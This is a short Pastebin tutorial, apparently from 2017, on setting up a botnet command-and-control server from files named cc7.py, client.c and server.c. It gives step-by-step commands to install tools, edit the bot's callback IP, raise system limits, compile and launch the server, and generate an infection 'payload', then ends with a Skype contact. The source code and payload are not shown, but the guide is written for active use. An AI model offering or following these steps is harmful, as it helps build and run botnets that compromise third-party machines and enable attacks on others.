Advertisement
Guest User

Untitled

a guest
May 21st, 2017
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Yo all the other tutorials are trash. Just follow this! :DD
  2.  
  3. Just get a server from idc and host the net on there.
  4. - yum install wget python nano gcc screen -y
  5.  
  6. + Upload your files ( cc7.py, client.c, server.c)
  7. To edit the client.c open in notepad + then highlight the ip (1.1.1.1:23) and replace all with yours.
  8. Then serch wget to see it if it truly changed all the ips. The 23 or whatever that number is is your bot port remember it.
  9.  
  10. -ulimit -Hn 999999;ulimit -Sn 99999;ulimit -s 999999;ulimit -n 999999;ulimit -u 999999
  11. echo -e 'ulimit -s 999999; ulimit -n 999999; ulimit -u 999999\n' > ~/.bashrc
  12. sysctl -w fs.file-max=99999 >/dev/null
  13.  
  14. - gcc -o server server.c -pthread
  15. = If worked correctly it should've made a server file in green
  16. -nano login.txt
  17. = write logins in here format user pass
  18.                              user pass
  19. exit out and save...
  20.  
  21. - screen ./server <BOTPORT> 1000 <PORT TO CONNECT>
  22.  
  23. - python cc7.py client.c <SERVER IP>
  24.  
  25. that green font at the end is your payload save that somewhere idc where.
  26.  
  27. now to connect open your putty or whatever enter your ip the port you want to connect with and RAW connection type, have fun.
  28.  
  29. =CONTACT=
  30. +Skype- neologisms
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement